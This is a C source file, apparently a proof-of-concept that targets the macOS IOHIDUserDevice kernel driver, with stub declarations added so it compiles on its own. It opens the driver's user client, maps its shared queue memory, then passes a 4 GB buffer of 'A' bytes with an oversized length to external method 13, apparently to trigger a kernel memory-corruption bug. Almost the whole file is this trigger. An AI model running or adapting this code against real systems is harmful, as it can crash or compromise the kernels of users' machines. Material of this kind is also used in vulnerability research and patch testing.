
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int uint64_t ;
typedef scalar_t__ uint32_t ;
typedef int mach_vm_size_t ;
typedef scalar_t__ mach_vm_address_t ;
typedef scalar_t__ kern_return_t ;
typedef scalar_t__ io_service_t ;
typedef int io_connect_t ;


 scalar_t__ IOConnectCallMethod (int ,int,int*,int,char*,int,int*,scalar_t__*,char*,size_t*) ;
 scalar_t__ IOConnectMapMemory (int ,int ,int ,scalar_t__*,int*,int ) ;
 scalar_t__ IOServiceGetMatchingService (int ,int ) ;
 int IOServiceMatching (char*) ;
 scalar_t__ IOServiceOpen (scalar_t__,int ,int ,int *) ;
 scalar_t__ IO_OBJECT_NULL ;
 scalar_t__ KERN_SUCCESS ;
 int MACH_PORT_NULL ;
 int getpid () ;
 int kIOMasterPortDefault ;
 int mach_task_self () ;
 char* malloc (int) ;
 int memset (char*,char,int) ;
 int printf (char*,...) ;

int main(int argc, char** argv){
  printf("pid: %d\n", getpid());
  kern_return_t err;

  io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOHIDUserDevice"));

  if (service == IO_OBJECT_NULL){
    printf("unable to find service\n");
    return 0;
  }

  io_connect_t conn = MACH_PORT_NULL;
  err = IOServiceOpen(service, mach_task_self(), 0, &conn);
  if (err != KERN_SUCCESS){
    printf("unable to get user client connection\n");
    return 0;
  }

  printf("got client\n");

  uint64_t inputScalar[16];
  uint64_t inputScalarCnt = 0;

  char inputStruct[4096];
  size_t inputStructCnt = 0;

  uint64_t outputScalar[16];
  uint32_t outputScalarCnt = 0;

  char outputStruct[4096];
  size_t outputStructCnt = 0;



  inputScalar[0] = 0;
  inputScalarCnt = 1;

  err = IOConnectCallMethod(
    conn,
    1,
    inputScalar,
    inputScalarCnt,
    inputStruct,
    inputStructCnt,
    outputScalar,
    &outputScalarCnt,
    outputStruct,
    &outputStructCnt);

  if (err != KERN_SUCCESS){
    printf("IOConnectCall error: %x\n", err);
    return 0;
  }

  printf("called external method open\n");

  mach_vm_address_t addr = 0x4100000000;
  mach_vm_size_t size = 0x1000;

  err = IOConnectMapMemory(conn, 0, mach_task_self(), &addr, &size, 0);
  if (err != KERN_SUCCESS){
    printf("IOConnectMapMemory failed:0x%x\n", err);
    return 0;
  }

  printf("mapped queue memory here: %016llx\n", addr);

  char* buf = malloc(0x100000000);
  memset(buf, 'A', 0x100000000);

  inputScalar[0] = 0x0;
  inputScalar[1] = 0x0;
  inputScalarCnt = 3;
  outputScalarCnt = 0;

  err = IOConnectCallMethod(
    conn,
    13,
    inputScalar,
    inputScalarCnt,
    buf,
    0xffffffff,
    outputScalar,
    &outputScalarCnt,
    outputStruct,
    &outputStructCnt);

  if (err != KERN_SUCCESS){
    printf("IOConnectCall error: %x\n", err);
    return 0;
  }

  return 0;
}
